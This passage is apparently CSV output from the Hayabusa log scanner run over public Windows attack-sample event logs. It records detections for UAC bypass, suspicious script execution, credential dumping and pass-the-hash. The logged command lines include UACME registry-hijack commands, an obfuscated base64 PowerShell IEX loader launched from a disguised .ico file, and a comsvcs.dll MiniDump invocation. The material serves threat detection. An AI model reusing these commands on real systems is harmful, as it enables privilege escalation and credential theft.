747F3D96-A686-5D46-0000-00108F56D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.714 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.774 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 
747F3D96-A686-5D46-0000-00100958D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:59.225 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:34:00.871 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:34:01.014 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 10:16:29.676 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:29.676 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:29.676 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From 
Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.175 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.476 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.476 +00:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.485 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 
747F3D96-B07F-5D46-0000-0010F1B20F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.609 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.949 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:32.001 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:32.438 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 
747F3D96-B080-5D46-0000-0010D4EA0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:32.438 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:50.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:50.009 +00:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:50.009 +00:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:50.455 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.299 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add 
HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.441 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.446 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.643 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | 
PGUID: 747F3D96-B097-5D46-0000-0010E7381204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.712 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 09:39:30.697 +00:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 09:39:30.697 +00:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 09:39:30.697 +00:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 11:53:29.688 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.010 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} 
-Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp 
Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_sysmon/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 12:17:14.614 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.614 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX 
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 
12:17:14.893 +00:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_sysmon/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-30 12:54:07.873 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:07.873 +00:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:07.873 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.257 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | 
Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.257 +00:00,MSEDGEWIN10,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/image_load_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.354 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.354 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.354 +00:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.396 +00:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.439 +00:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 11:54:22.450 +00:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-01 12:04:22.033 